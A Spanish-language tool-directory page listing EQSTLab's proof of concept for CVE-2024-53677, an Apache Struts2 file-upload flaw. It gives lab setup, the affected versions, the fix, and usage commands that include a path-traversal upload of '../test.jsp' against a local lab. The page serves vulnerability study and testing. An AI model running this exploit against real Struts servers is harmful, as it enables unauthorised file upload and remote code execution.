Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-53677 — Fallo en la lógica de subida de archivos en el exploit de Apache Struts2 | Kitploit
Herramientas/GitHubGitHub/eqstlab/cve-2024-53677
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubeqstlab/cve-2024-53677

CVE-2024-53677

Fallo en la lógica de subida de archivos en el exploit de Apache Struts2

Ver Repositorio
172hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Esta publicación es un artículo de investigación publicado por EQSTLab.

CVE-2024-53677

★ CVE-2024-53677 Carga sin restricciones de archivos con tipo peligroso y PoC de RCE ★

Configuración del Laboratorio

root@kitploit:~
cd docker
docker build --ulimit nofile=122880:122880 -m 3G -t cve-2024-53677 .
docker run -p 8080:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name cve-2024-53677 cve-2024-53677

Cronología

11 Dic: PoC de carga de archivos CVE-2024-53677 subido

Descripción

CVE-2024-53677: la lógica de carga de archivos en Apache Struts es defectuosa. Un atacante puede manipular los parámetros de carga de archivos para habilitar el path traversal y, en algunas circunstancias, esto puede conducir a la carga de un archivo malicioso que puede utilizarse para ejecutar código remoto (RCE). Este problema afecta a Apache Struts: desde 2.0.0 hasta antes de 6.4.0. Se recomienda a los usuarios actualizar al menos a la versión 6.4.0 y migrar al nuevo mecanismo de carga de archivos https://struts.apache.org/core-developers/file-upload. Si no se utiliza una lógica antigua de carga de archivos basada en FileuploadInterceptor, su aplicación está segura. Puede encontrar más detalles en .

https://cwiki.apache.org/confluence/display/WW/S2-067

Cómo usarlo

Clonar el repositorio

root@kitploit:~
git clone https://github.com/EQSTLab/CVE-2024-53677.git
cd CVE-2024-53677

Instalar paquetes

root@kitploit:~
pip install -r requirements.txt

Comando

root@kitploit:~
# Upload the default file
python CVE-2024-53677.py -u <URL> -p <top.UploadFileName>
# Upload Specified File
python CVE-2024-53677.py -u <URL> -p <top.UploadFileName> -f <File Path>

Ejemplo

root@kitploit:~
python CVE-2024-53677.py -u http://localhost:8080/upload.action -p ../test.jsp
python CVE-2024-53677.py -u http://localhost:8080/upload.action -p ../test.jsp -f ./test.txt

Salida

CVE-2024-53677.py

Resultado

Aviso legal

Este repositorio no pretende ser un exploit de inyección de objetos para CVE-2024-53677. El propósito de este proyecto es ayudar a las personas a aprender sobre esta vulnerabilidad y, quizás, probar sus propias aplicaciones.

EQST Insight

Publicamos análisis de CVE y malware una vez al mes. Si está interesado, siga los enlaces a continuación para consultar nuestras publicaciones. https://www.skshieldus.com/eng/business/insight.do

Referencias

https://nvd.nist.gov/vuln/detail/CVE-2024-53677

https://y4tacker.github.io/2024/12/16/year/2024/12/Apache-Struts2-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%80%BB%E8%BE%91%E7%BB%95%E8%BF%87-CVE-2024-53677-S2-067/

https://attackerkb.com/topics/YfjepZ70DS/cve-2024-53677

https://github.com/Trackflaw/CVE-2023-50164-ApacheStruts2-Docker

Descargar herramienta